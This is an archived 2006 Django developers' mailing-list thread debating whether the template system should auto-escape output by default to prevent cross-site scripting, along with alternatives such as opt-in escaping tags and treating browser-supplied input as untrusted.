IMO, the point of auto-escaping is that the template author should not have to worry about
the origin of the string, but about how he uses it. The origin of the string in the
context can change, just for an example. Or are we talking about different meanings
of the word 'origin'? I'm really not sure if I understand you correctly.

> Although having though more about this, I
> can't see that it offers any benefit over your intelligent
> auto-escaping apart from being explicit in the template. The real
> benefit of that is probably a matter of opinion.

Hmm ... who's the one who does the intelligent auto-escaping, that's the point.
I consider it the job of the programmer, you consider it the job of the template
author. I say that the template author does not know or perhaps not even understand
where the string comes from and whether it is escaped or not; you say the template author
knows best what he uses.

It would be nice to get the opinion of somebody like Jeff Croft or Wilson Miner on this.
Does any of you follow the developers' list?


> Regardless, there's another situation that will most likely arise that
> needs to be discussed in your proposal: A string of escaped text is to
> be rendered with *further* escaping. What should happen for {{
> escaped_str|escape }}? One use case for this is a page with both a
> preview and an edit field for HTML content:
>
> {{ page_html }}
> <textarea>{{ page_html|escape }}</textarea>
> Nothing difficult to solve here, just aiming for completeness.

That's a good one! You need either:

- something to turn an escaped_string into string
- something like "really_really_escape_this"
- a template filter like "html_source" that escapes a string twice and an escaped_string once.

I'm feeling inclined towards the third option. Any use case for another layer of escaping? Then I'd really scratch my head.


>> Note that the escaping does not happen in the context, but during rendering, so that template filters
>> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.
>
> One thing that bothered me about the proposal was having the
> auto-escape property set in the context; which I believe is the wrong
> place; it should be set in the Template instance (or subclass). A
> context should be reusable between different templates (e.g. an html
> page, a JSON object, an XML page).

As long as you don't put any escaped_strings into the context, the context can be used anywhere.
But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
the usage of the context. Thus, I don't see a problem here.

Do you agree, or do you see anything I don't?

Michael

Adrian Holovaty

unread,
Jun 20, 2006, 9:36:05 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

I've gotta say, I don't like the concept of auto-escaping on by
default. I'd rather not have the framework automatically munging my
data behind my back: it'd be a case of the same type of magic that we
removed in the magic-removal branch. In-bulk escaping should be an
opt-in thing, not an opt-out thing.

Adrian

--
Adrian Holovaty
holovaty.com | djangoproject.com

James Bennett

unread,
Jun 20, 2006, 9:56:44 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Adrian Holovaty <holo...@gmail.com> wrote:
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

I'm 100% in agreement. Most of Simon's proposal looks good to me,
except that I'd want to see autoescape off by default.

Michael Radziej

unread,
Jun 20, 2006, 10:11:10 AM6/20/06
to django-d...@googlegroups.com
Adrian Holovaty wrote:
> On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

<sarcasm>
You're against automatically quoting your data in the database driver?
Let's rip it out, bad magic that munges your data behind your back.
</sarcasm>

I haven't used the magical versions of Django, but I regard the magic that
has magically imported models a different thing. In every framework things
happen automatically, and just calling it "bad magic" is something that
might result in ending the discussion, but I personally don't consider this
a pretty good argument.

But, looking at the recent bugs in the Admin:

2006, __str__() output not escaped in breadcrumbs and filters
2152, username was not escaped

Perhaps neither of this would be fixed with auto-escaping. But I want to
emphasize that bugs like this happen all the time, are hard to spot and
are inherently dangerous. If you escape too much, you'll spot it easily,
and not much harm has been done.

Automatic quoting in the database layer is great, and does a tremendous job
stopping sql injection bugs. Automatic escaping in the template would be
just as good to stop XSS bugs.

Michael

Adrian Holovaty

unread,
Jun 20, 2006, 10:25:58 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Michael Radziej <m...@noris.de> wrote:
> <sarcasm>
> You're against automatically quoting your data in the database driver?
> Let's rip it out, bad magic that munges your data behind your back.
> </sarcasm>

I figured somebody might bring up this example, but it isn't quite
analogous. With a database query, you don't really care what the
textual output (SQL) is. With a template, you do.

Simon Willison

unread,
Jun 20, 2006, 10:43:32 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 15:11, Michael Radziej wrote:

> But, looking at the recent bugs in the Admin:
>
> 2006, __str__() output not escaped in breadcrumbs and filters
> 2152, username was not escaped
>
> Perhaps neither of this would be fixed with auto-escaping. But I
> want to
> emphasize that bugs like this happen all the time, are hard to spot
> and
> are inherently dangerous. If you escape too much, you'll spot it
> easily,
> and not much harm has been done.

This is exactly why I'm for auto escaping - these bugs sneak in all
over the place; they aren't something that only affects careless or
newbie developers. I bet there's a bunch hiding in the current Django
source code.

If we did have it as an opt-in thing rather than being turned on by
default we'd also have to include a bunch of stuff in the docs saying
"we really, really strongly suggest that you opt-in to this".

I'm actually on the fence as to having it on by default - my gut
feeling is that it's a good idea, since every framework ever that
hasn't done it has been plagued by XSS problems. That said, I don't
think we can get a really good feel for how it works in practise
until we can actually play with working code - which is why I want to
build it in a branch (until we're sure that it works nicely it
definitely shouldn't be inflicted on people following trunk).

Cheers,

Simon

Michael Radziej

unread,
Jun 20, 2006, 10:51:26 AM6/20/06
to django-d...@googlegroups.com
Adrian Holovaty wrote:
> On 6/20/06, Michael Radziej <m...@noris.de> wrote:
>> <sarcasm>
>> You're against automatically quoting your data in the database driver?
>> Let's rip it out, bad magic that munges your data behind your back.
>> </sarcasm>
>
> I figured somebody might bring up this example, but it isn't quite
> analogous. With a database query, you don't really care what the
> textual output (SQL) is. With a template, you do.

Really?

* I do depend on that the database get's the right data and not a ' or a ` too much. Same for escaping.

* And I don't care whether the programmer has hand-escaped a string or it has happend during template rendering.
Same for the database quotes.

And furthermore:

* It's a lot more important that my site does not have XSS exploits which I usually don't find,
compared to whether here and there I get a multiple times escaped strings, which I usually spot
during testing. Perhaps I'm obsessed about security, but why shouldn't I? And: same for the database quotes.

I'm really curious where this dislike for auto-escaping comes from. Does it come from php? I'd like to follow you or convince you, but I cannot as long as I don't understand what your reason or experience with this is.

Let me add that I share Simon's opinion that this needs to get tried out to see how it feels in practice.

Michael

James Bennett

unread,
Jun 20, 2006, 11:25:03 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Michael Radziej <m...@noris.de> wrote:
> I haven't used the magical versions of Django, but I regard the magic that
> has magically imported models a different thing. In every framework things
> happen automatically, and just calling it "bad magic" is something that
> might result in ending the discussion, but I personally don't consider this
> a pretty good argument.

Having an easy-to-use mechanism like a block tag which escapes
everything inside it is good; a template author can just stick {%
autoescape on %} at the top of a file and {% endautoescape %} at the
end, and not have to worry. This would likely be used in the admin.

But having a block tag which does escaping *and* having it on by
default is a bit magical and is just asking for problems in the same
vein as PHP's magic_quotes. It also feels like overkill; on my blog,
for example, there are only a couple places where I need to escape
content (comments and search results pages, since both display content
that came from users). Having to remember to turn off escaping
elsewhere for all the other places where I *want* to output HTML would
seriously annoy me and wouldn't be worth the benefit.

Security by annoyance is security that people learn to hate and turn
off as soon as they can, so in the end it doesn't really make them any
more secure than they were before.

Simon Willison

unread,
Jun 20, 2006, 11:49:56 AM6/20/06
to django-d...@googlegroups.com
On 20 Jun 2006, at 16:25, James Bennett wrote:

> Security by annoyance is security that people learn to hate and turn
> off as soon as they can, so in the end it doesn't really make them any
> more secure than they were before.

Agreed - which is why I want to try it in a branch and see if it's
actually annoying :)

Cheers,

Simon

Tom Tobin

unread,
Jun 20, 2006, 11:57:52 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
>

The problem is that the only ones testing that branch would be those
already inclined towards default-on autoescaping; those of us who are
against it *already know* it would be annoying. :-p

Daniel Poelzleithner

unread,
Jun 20, 2006, 12:52:30 PM6/20/06
to django-d...@googlegroups.com
Simon Willison wrote:
>
> On 19 Jun 2006, at 21:00, pub...@kered.org wrote:
>
>> anyway, i suppose i will wait for you to elaborate on your
>> reasoning in
>> the wiki this evening. :)
>
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

I like much of this stuff.

Here some further ideas:

I don't like the {% endautoescape %} just to print a unescaped variable.
Maybe the idea of the python string type prefix would help here and
would allow further improvments to be implemented nicely (thinking about
unicode problems...)

{{r#somevariable}} or {{r:somevariable}}

Even the last one looks strange at first, but is logical under the idea
that r ist just like any other function and generates a escapedstr out
of a string, or escapedunicodestring out of a unicode

2. Currently the autoescape, or better escape in general escapes <>, etc.
But what if you have some different type of output, then you have to do
everything by hand or write other filters, but could be messy.

{% escape_type tex|cvs|something... %}

would set a reference to the escape function of this template instance,
which is default to html. escape and autoescapestring would use this
reference instead of fixed coded escape function. This would allow to
write clean templates, with nearly no bloat in implementation.

kindly regards
Daniel

Linicks

unread,
Jun 20, 2006, 7:24:38 PM6/20/06
to Django developers

All,
Would it be possible to do a validation test against the templates at
startup, and/or with a separate utility?

Something like : #python manage.py cktemp appname

I guess I was thinking of something like XML validation. The advantage
of this is that it wouldn't be automatically manipulating anything,
just letting you know that there is a problem. I'm not really
supportive of anything that would encourages bad practice. For example
HTML was so unrestricted that you could get away with almost anything,
with XHTML you actually have to do things properly and validate your
work.

Thanks!
--Nick
P.S. Sorry if I missed a similar suggestion in an earlier thread :)

adurdin

unread,
Jun 21, 2006, 8:32:16 AM6/21/06
to Django developers
Michael Radziej wrote:
>
> IMO, the point of auto-escaping is that the template author should not have to worry about
> the origin of the string, but about how he uses it. The origin of the string in the
> context can change, just for an example. Or are we talking about different meanings
> of the word 'origin'? I'm really not sure if I understand you correctly.

What I was thinking of here was just reversing the existing situation:
so that everything would be escaped by default (at the last minute only
-- just before it's output into the rendered string) unless explicitly
marked otherwise (the "raw" filter in my examples) -- no automatic
decisions based on settings made in the tag functions or anywhere.

> Hmm ... who's the one who does the intelligent auto-escaping, that's the point.
> I consider it the job of the programmer, you consider it the job of the template
> author.

That's it in a nutshell.

> I say that the template author does not know or perhaps not even understand
> where the string comes from and whether it is escaped or not; you say the template author
> knows best what he uses.

I would expect the template author to be competent with HTML and to
understand the need for escaping. But then the same has to hold anyway
for the programmer... :-)
I don't think there's a "right" answer here, at least not obviously --
either way has pros and cons. I lean towards trying to do less
'magic', because things are usually more inherently predictable that
way:

What's the result of {{ foo|bar|baz }}?

With escaped_strings, the answer depends on (a) whether foo is an
escaped_string, (b) how 'bar' handles strings vs. escaped_strings as
input, (c) whether 'bar' outputs strings or escaped_strings, (d) how
'baz' handles strings vs. escaped_strings as input, (e) whether 'baz'
outputs strings or escaped_strings, and (f) the auto_escape setting.
(And if either bar or baz delegates most of its work to an existing
filter because it's only a small ehancement upon it... you get the
picture)

With my last-minute escape-unless-told-otherwise, the answer only
depends on (f) the auto_escape setting (as there's no |raw filter
here).

Hence, with escaped_strings, there need to be strong guidelines (if not
rules) concerning how filters and tags should deal with
escaped_strings, so that the answers to (b), (c), (d), and (e) can be
predictable.

> > {{ page_html }}
> > <textarea>{{ page_html|escape }}</textarea>
> > Nothing difficult to solve here, just aiming for completeness.
>
> That's a good one! You need either:
>
> - something to turn an escaped_string into string
> - something like "really_really_escape_this"
> - a template filter like "html_source" that escapes a string twice and an escaped_string once.
>
> I'm feeling inclined towards the third option.

It all depends on how you want the default "escape" filter to behave:
should {{ greater_than|escape|escape|escape }} produce "&gt;" or
"&amp;amp;gt;"? I say the "escape" filter should always escape --
whether the string its given is a string or escaped_string. Simple, and
obvious/explicit ("I say escape, and it escapes").


> > One thing that bothered me about the proposal was having the
> > auto-escape property set in the context; which I believe is the wrong
> > place; it should be set in the Template instance (or subclass). A
> > context should be reusable between different templates (e.g. an html
> > page, a JSON object, an XML page).
>
> As long as you don't put any escaped_strings into the context, the context can be used anywhere.
> But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
> the usage of the context. Thus, I don't see a problem here.
>
> Do you agree, or do you see anything I don't?

No, it's only an issue with unescaped strings. Say I've got a view
which produces either json output (for an API interface) or html output
(for a browser interface) -- I want to use the same context for both,
because they're displaying the same data (perhaps even some html code
which gets used for innerHMTL() by the API); but I don't want the json
one to do the automatic html escaping, or my json strings will be
messed up.

I'm trying to illustrate with this that the auto_escape flag doesn't
logically belong as a property of the context, but instead as a
property of the template instance or template subclass, or the
renderer's state. Either that or I'm completely misunderstanding the
intended uses of the Context class.

Andrew

Michael Radziej

unread,
Jun 21, 2006, 9:18:50 AM6/21/06
to django-d...@googlegroups.com
Hi Andrew,

it appears to be decided that Adrian won't include auto-escaping,
but I'd like to round-up this discussion so that we can gather
the pros and cons somewhere. I bet that this discussion will pop
up again ...

For as much as I see, the discussion looks pretty thorough. I
acknowledge your statements. While surely auto-escaping could
help a lot in escaping XSS, it's not for sure that auto-escaping
might complicate things too much. I'd rather like to see how it
looks in reality before I could make my own mind up.


Just one thing I'd like to comment:

>>> One thing that bothered me about the proposal was having the
>>> auto-escape property set in the context; which I believe is the wrong
>>> place; it should be set in the Template instance (or subclass). A
>>> context should be reusable between different templates (e.g. an html
>>> page, a JSON object, an XML page).
>> As long as you don't put any escaped_strings into the context, the context can be used anywhere.
>> But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
>> the usage of the context. Thus, I don't see a problem here.
>>
>> Do you agree, or do you see anything I don't?
>
> No, it's only an issue with unescaped strings. Say I've got a view
> which produces either json output (for an API interface) or html output
> (for a browser interface) -- I want to use the same context for both,
> because they're displaying the same data (perhaps even some html code
> which gets used for innerHMTL() by the API); but I don't want the json
> one to do the automatic html escaping, or my json strings will be
> messed up.

Yes, and this must be avoided. See item (a) below.

> I'm trying to illustrate with this that the auto_escape flag doesn't
> logically belong as a property of the context, but instead as a
> property of the template instance or template subclass, or the
> renderer's state. Either that or I'm completely misunderstanding the
> intended uses of the Context class.

There are three aspects of auto-escaping:

(a) The kind of auto-escaping depends on the usage of the
template and needs to be an attribute of the template (or coded
in the Template subclass).

(b) Whether or not a string needs to be escaped if it is not
already, depends on the surrounding in the template. Thus, we
need a method to switch it off by template tags or
programmatically within a template filter or tag.

(c) Whether or not a string is already in escaped form needs to
be marked by the programmer in the view, manipulator or elsewhere.

Michael

Derek Hoy

unread,
Jun 21, 2006, 9:20:02 AM6/21/06
to django-d...@googlegroups.com
On 6/20/06, SmileyChris <smile...@gmail.com> wrote:
>
> But it is an escaping issue.

Isn't the most common use case for this the problem of people entering
bad stuff into a form? In which case, regarding it as a validation
issue seems good to me.

For example, I used Webmin a few days ago to fix some problems
directly in the DB tables, so any bad html could have been fired up on
viewing the data. If I don't want people entering it, I don't want it
in the DB, having to be escaped each time it's viewed.

--
a different Derek

Michael Radziej

unread,
Jun 21, 2006, 9:28:37 AM6/21/06
to django-d...@googlegroups.com
Derek Hoy wrote:
> On 6/20/06, SmileyChris <smile...@gmail.com> wrote:
>> But it is an escaping issue.
>
> Isn't the most common use case for this the problem of people entering
> bad stuff into a form? In which case, regarding it as a validation
> issue seems good to me.

This is the perl-taint-approach. But it isn't very user friendly.
It means that you forbid to use e.g. "<" in text fields, just
because you might somewhere have forgotten to escape your data.

Michael

pub...@kered.org

unread,
Jun 21, 2006, 10:26:06 AM6/21/06
to django-d...@googlegroups.com
not true. no browser interprets a single "<" as a tag unless it has a
valid tag name (and company) and closing ">" directly after it. only the
most rudimentary implementations would blindly strip "<"s without looking
at their context.

(and they would be wrong anyway - consider <input value="<">)

Michael Radziej

unread,
Jun 21, 2006, 10:47:18 AM6/21/06
to django-d...@googlegroups.com
pub...@kered.org wrote:
> not true. no browser interprets a single "<" as a tag unless it has a
> valid tag name (and company) and closing ">" directly after it. only the
> most rudimentary implementations would blindly strip "<"s without looking
> at their context.

So, how exactly would you validate the input without forbidding
anything?

Michael


Pete Crosier

unread,
Jun 21, 2006, 11:17:46 AM6/21/06
to django-d...@googlegroups.com
"My vote is for escaping being off unless explicitly turned on, and for it being turned on in the template."

My thoughts exactly, my templates are the places that define the output of my applications. I can see the benefits of people been able to define how escaping happens _in the template_, _if they want it to_ .. but I know the first thing I'd do in an on-by-default situation would be to turn it off.
 
By all means, encourage some security through education in the documentation. But hang back on the magic, which it will seem like to some people in a team.

pub...@kered.org

unread,
Jun 21, 2006, 12:06:34 PM6/21/06
to django-d...@googlegroups.com
noone said "forbid nothing". i said "you don't need to forbid all '<'s",
which is what you proposed was a problem with a data validation take.

you would obviously forbid html in an HTMLSafeCharField, which does limit
user's input. i'm just saying that in the vast, vast, vast majority of
form inputs, db fields, etc., html is an invalid input anyway, so this is
trivial restriction.

plus remember that this would be optional, per-field, and not the default.
(ie, i'm not suggesting we modify the CharField to by default forbid
html)

Michael Radziej

unread,
Jun 21, 2006, 12:25:18 PM6/21/06
to django-d...@googlegroups.com
pub...@kered.org wrote:
> noone said "forbid nothing". i said "you don't need to forbid all '<'s",
> which is what you proposed was a problem with a data validation take.

My point was that your approach restricts user input. "<" was a
simple example for this.

Not that, first, it's not really simple to catch all html tags in
forms that *any* browser on the market might take for html
markup--some browser accept really weird forms. Second, it's not
really a good reason to restrict user input simply because you're
unable to escape your data properly.

There are other reasons why validating user input in general is a
good thing, of course. But it does not solve the escape problem,
since you also need free-form text entry fields.

Michael

James Bennett

unread,
Jun 21, 2006, 12:48:25 PM6/21/06
to django-d...@googlegroups.com
The more I think about it, the more I find I have two objections to
the auto-escaping stuff.

1. A philosophical objection. One thing Django does, and does pretty
well IMHO, is encourage best practices. Pretty much every aspect of
Django, from the overall architecture of the framework to the workings
of individual bits, involves some sort of explicit "this is a good way
to do things"; whether it's the loose coupling of the major components
or little things like encouraging the use of HttpResponseRedirect
after a POST, we do our best not to magically enforce these practices,
but to explain why they _are_ best practices and why you should take
advantage of our support for them. The result is that people both use
_and_ understand these best practices, which makes them better
developers and leads them to build better apps. Any form of
automatically-enabled escaping would be a serious break with this, and
would move us out of the realm of "this is a good way to do it" into
"this is what we say is the right way to do it, and we're going to try
to make you do it this way". I don't like that.

2. A security objection. Escaping content on output is only half the
battle; there's no such thing as a truly secure web application, and
escaping content on output glosses that over by pretending that a
magic incantation will solve XSS problems. The best practice for
securing against XSS also involves, at the very least, doing input
sanitization as well -- relying on output escaping alone both concedes
that malicious users can get what they want into your database, and
creates a single point of failure. If there's a bug in the escaping
system, or if someone forgets to use the correct escaping commands,
then the unsafe data that was stored can be sent down the wire to
wreak havoc. If input sanitization is in use as well, that's one more
layer of protection that can keep unsafe data from ever getting to the
DB.

So, here's a proposal:

Let's implement the escaping system -- off by default -- and play up
that any time you're outputting something which came from a
non-trusted source you should escape it. Some people will likely
continue to rely on selective application of the existing 'escape'
filter, but there are bound to be situations where a block tag is a
better solution so the flexibility of having both will be good.

And while we're at it, let's get serious about input handling. The
first thing which occurs to me is to add a 'hasNoHTML' validator in
django.core.validators; possibly this would be accompanied by a
boolean 'allows_html' argument to TextFields and CharFields, or maybe
we just advertise judicious use of validator_list. Either way, the
documentation should emphasize as strongly as possible that it exists
and should be used.

And above and beyond that, I think we really need a well-written
security best-practices document which would cover escaping and input
validation as well as other factors. There are plenty of things within
Django that can be done to enhance security, and there are plenty of
non-Django things that users can implement to supplement that (e.g.,
if you're using Apache, get mod_security). It'd be great to mention
those and provide some concrete examples of how to use them
effectively.

James Bennett

unread,
Jun 21, 2006, 12:57:02 PM6/21/06
to django-d...@googlegroups.com
And just to clarify, when I talk about implementing the escaping
system, I mean a block tag which escapes everything inside itself as
appropriate. Nothing more, nothing less.

Simon Willison

unread,
Jun 21, 2006, 1:13:08 PM6/21/06
to django-d...@googlegroups.com

On 21 Jun 2006, at 17:48, James Bennett wrote:

> And while we're at it, let's get serious about input handling. The
> first thing which occurs to me is to add a 'hasNoHTML' validator in
> django.core.validators; possibly this would be accompanied by a
> boolean 'allows_html' argument to TextFields and CharFields, or maybe
> we just advertise judicious use of validator_list. Either way, the
> documentation should emphasize as strongly as possible that it exists
> and should be used.

Completely agree on input handling. Django's current validation stuff
is reasonable but it's not quite good enough - there are some crufty
things in the existing system (do_html2python is one particularly
noticeable wart) but it's still not easy enough to see how you would
validate a form that is nothing to do with a data model - a "contact
me" form for example. The manipulator API simply isn't easy enough to
use.

More to the point though, the smartest technique for input validation
I've seen is this kind of thing:

email = get_valid_email_address_from_GET_field('email')
age = get_positive_integer_from_POST_field('age')
date = get_python_date_from_GET_field('date')

Obviously those are ludicrous function names, but it should be clear
what they are doing. Rather than directly accessing GET and POST data
you do it through some mechanism that /guarantees/ the format of the
data returned - and raises an exception if it can't make that
guarantee. There is no possible way of invalid data ending up in the
email and age variables, so once you're past that bit of code you can
continue safe in the knowledge that the data is at least in the right
format.

Obviously I haven't figured out exactly how the API for this should
look, but I think the core concept is really powerful.

Cheers,

Simon

oefe

unread,
Jun 21, 2006, 5:12:21 PM6/21/06
to Django developers
Hi,

I'm new to this group, so let me give you a little background about
myself:
I'm not a professional web developer (I'm writing Windows apps), but
have done a few private web projects for fun and to learn new things. I
recently redsigned a TurboGears project in Django, and liked the
experience very much. Especially the templating systems are like night
and day. But there is one thing that I liked about Kid: escaping just
works. By contrast, escaping in Django templates - well thats what this
thread is about....

James Bennett wrote:
> On 6/16/06, Christopher Lenz <cml...@gmx.de> wrote:
> > To reiterate: templates shouldn't need to care about escaping. Django
> > *in particular* uses an intentionally dumbed down template system
> > that is supposed to be easy for non-programmers, which includes the
> > notion that little mistakes in templates shouldn't break the site or
> > even introduce security holes.
>
> The problem here, architecture-wise, is that the template is the thing
> that cares about what output looks like. Moving the decision of
> whether to escape or not into some other part of the stack breaks with
> that and introduces the possibility of frustrating inconsistency in
> the templating system; explaining to a template author why {{ foo }}
> escapes in one case but not another, based on (to the template author)
> black magic happening in the backend isn't something I particularly
> want to do.
>
>
> > IMHO, a real solution for this problem is that any normal string
> > inserted into template output is escaped by default. This does not
> > necessarily mean that there needs to be an unescape filter, though.
>
> Yes. Yes, it does.
>
> > In fact, most of the time Django components that generate a string
> > they *know* that they are generating text that must not be escaped,
> > such as the output of the markdown filter, or form field render()
> > results. Those places should flag the strings they are generating in
> > some way (for example by wrapping them in a special class), thereby
> > signaling to the template system that those strings should not be
> > escaped again.
>
> As someone who's followed various RSS-related discussions for a long
> time, I can say that having multiple layers of a system have to worry
> about whether the other layers have escaped or unescaped something is
> a very special kind of hell that I don't want Django to get mired in.

Didn't confusion with RSS (and in many similar cases) come because
there were no clear and unambiguous rules, and different
implementations implemented different behaviour? By contrast, Atom uses
well-defined rules (XML), which are strictly supported by all XML
toolkits.

Likewise, XML-based templating systems like XSL or Kid don't have
escaping issues (as long as the output is XML or some closely related
format like html). For example in Kid, every template parameter is
escaped, except XML nodes (i.e. ElementTree objects). If you have a
string that is a valid xml fragment, that you don't want to be escaped
you have it to convert into XML nodes (Kid provides the XML() function
to do this).

However, this is almost the only thing I like about XML-based
templates. In almost all other aspects, I prefer Django templates. It's
a trade-off between security and convenience, similar to static versus
dynamic typing. Guess what I prefer ;-)

Taking the typing comparison one step further, the escaping situation
in Django templates currently corresponds to weak typing, not to the
dynamic, but strong typing of python. I would prefer a stronger, but
still dynamic and flexible solution...

> But beyond that, it feels like a violation of loose coupling; doing
> this would bind Django components to each other in ways that don't
> feel right.

A component (tag, filter, context variable) that generates markup, for
example html, is already coupled to that format. This coupling doesn't
get stronger if you require that the component states this fact
clearly.

> My vote is for escaping being off unless explicitly turned on, and for
> it being turned on in the template.

Agreed.
To prevent XSS vulnerabilities because someone forgot to specify the
escaping rule, I would suggest that templates should, maybe even must
specify their escaping. For example, require each template to contain a
special {% autoescape <format> %} tag at the beginning, e.g. {%
autoescape html %}. If the designer doesn't want any auto-escaping, she
should say so: {% autoescape off %} (or plaintext, if you prefer).

For a transition period, this could be a should-condition. If a
template doesn't contain this tag, Django would output a warning and
assume autoescape off. Later, if you want it to be really strict, this
could be changed into an error. (It would also possible to choose
between warning and error this via a global setting, without causing
the php autoescape headaches.)

Likewise tags, filters, and context variables (together: template
input) that return markup must state this and specify its format. This
could be done with the escapedstr class described in the Wiki, but the
class should have an additional attribute that indicates the format.
The template could examine this attribute to decide whether to escape
this template input:
- if the format is plaintext or not specified at all (e.g plain
string), escape.
- if the format is the same as the template format, don't escape.
- if the format is different than the template format, complain. (Or do
something "smart" in special case, for example a javascript format
could accept html, provided it is inside a javascript string? I think
this would be too much magic.)

ciao
Martina

Tom Tobin

unread,
Jun 21, 2006, 5:40:00 PM6/21/06
to django-d...@googlegroups.com
On 6/21/06, oefe <mar...@oefelein.de> wrote:
>
> Agreed.
> To prevent XSS vulnerabilities because someone forgot to specify the
> escaping rule, I would suggest that templates should, maybe even must
> specify their escaping. For example, require each template to contain a
> special {% autoescape <format> %} tag at the beginning, e.g. {%
> autoescape html %}. If the designer doesn't want any auto-escaping, she
> should say so: {% autoescape off %} (or plaintext, if you prefer).

Oh ye gods, please no. :-)

This is exactly what James was referring to as "security by
annoyance"; forcing me to place a boilerplate like that at the top of
every template is going to get frustrating, fast.

SmileyChris

unread,
Jun 21, 2006, 6:16:24 PM6/21/06
to Django developers
James Bennett wrote:
> Security by annoyance is security that people learn to hate and turn
> off as soon as they can, so in the end it doesn't really make them any
> more secure than they were before.

Having used TAL a lot (like KID, automatically escapes), I did not
actually find this annoying.
Maybe it's just a different mindset, but I'd rather have an occasional
"oh yea, I meant to pass that raw" experience rather than have the
chance of missing variables that should be escaped.

The thing is, it's very hard to "miss" a variable that you meant to
pass raw when testing. It's very easy to miss one that you should have
escaped. Maybe I'm just not god-like enough...

I'm feeling a bit disparaged that some key people don't seem to see
this as an issue.

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 6:31:43 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 12:13 PM, Simon Willison wrote:
> Rather than directly accessing GET and POST data
> you do it through some mechanism that /guarantees/ the format of the
> data returned - and raises an exception if it can't make that
> guarantee. There is no possible way of invalid data ending up in the
> email and age variables, so once you're past that bit of code you can
> continue safe in the knowledge that the data is at least in the right
> format.
>
> Obviously I haven't figured out exactly how the API for this should
> look, but I think the core concept is really powerful.

OK, *now* we're getting somewhere!

Another place to start solving the XSS problem is at the input level;
a policy of "don't trust data from the web" makes a lot more sense to
me than one of "don't trust the template author".

Following that thread, I'm much more receptive to ideas involving
"tainting" the data in request.GET and friends. Actually, I'm going
to try to stay away from the word "taint" since it evokes both a
nasty bit of perl *and* a nasty bit of male anatomy...

Anyway, here's a rough sketch of how I'd picture enforced mistrust of
browser-supplied data:

1. request.GET['whatever'] returns a ``untrusted_string`` object, not
a regular string

2. Methods exist somewhere to "translate" untrusted strings into
"normal" strings given a particular format. Like Simon, I'm not sure
how to spell this, but I'm sure a good syntax could be found.

3. Manipulator's ``do_html2python`` methods automatically call these
untrusted -> trusted methods based on field types; this makes the
common case of using a manipulator unchanged.

4. The template engine automatically escapes untrusted strings
(unless explicitly passed through a ``raw`` filter) -- this protects
you from errors when echoing back data given from the browser.

5. If untrusted strings "sneak" all the way down to the database
layer... well, I'm not sure about this step; potential options are
(a) automatically escaping before storing in the database, (b)
raising an exception, or (c) just letting it happen. I think I
prefer (b).

Thoughts?

Jacob

PS: To be a bit more explicit about my thoughts on this whole thread:
I'd say at this point any XSS proposal that involves some sort of
mangling at the template level is pretty much a non-starter. So
let's all focus our attentions on attacking this problem from the
other direction.

Rudolph

unread,
Jun 21, 2006, 6:35:42 PM6/21/06
to Django developers
Hi,

How about adding a command to django-admin.py that scans all the
templates of the project and enabled apps and gives you a list of
templates that have unescaped values in them, maybe even display the
tags/lines concerned. IMHO this could be very valueable info for a
developer.

Rudolph

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 6:41:33 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 5:16 PM, SmileyChris wrote:
> Having used TAL a lot (like KID, automatically escapes), I did not
> actually find this annoying.

I really wish there was a way of saying this that didn't make me
sound like a jerk... but:

If you like TAL better, use it.

Again, I'm not trying to be mean; it's just that there's no way that
Django's template language can be everything to everybody. There's
no right and wrong here, there's just what "fits" with the rest of
the framework, and encapsulating a distrust of the developer into
this framework doesn't feel right.

Yes, Django should be accessible to newbies, but newbie-friendliness
needs to be balanced against the needs of experienced web developers
(who likely already know all about XSS).

In the end the awesome, amazing, wonderful thing about Python is the
size of the ecosystem. If auto-escaping in templates is not
negotiable for you, you can always turn elsewhere -- and that's a
feature, not a bug!

> I'm feeling a bit disparaged that some key people don't seem to see
> this as an issue.

Security is a very big issue, and I at least take this discussion
very seriously. Don't mistake a distaste for the proposed solution
for apathy about the problem.

So that's my story, and I'm sticking to it :)

Jacob

Tyson Tate

unread,
Jun 21, 2006, 7:21:32 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 3:31 PM, Jacob Kaplan-Moss wrote:

> [...]


> Another place to start solving the XSS problem is at the input level;
> a policy of "don't trust data from the web" makes a lot more sense to
> me than one of "don't trust the template author".

Modded "+5 Insightful" :) I can attest personally [1] that doing it
the other way around is an invitation to disaster and inherently
insecure code. The last thing Django needs is a reputation for
insecurity and to go down the path of phpBB and mailman et al. Making
it easy to be secure (i.e. secure by default) benefits everyone. I'd
rather have to manually "non-escape" the occasional string than
escape most all of my strings by hand.

> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.

Heck, why not Python's own cgi.escape? [2] Seems trusty enough to me,
though I could be wrong because I'm no Python expert. And, of course,
we can always just use a wrapper method to build on cgi.escape to
allow for further escaping/whatever. (Then again, perhaps I
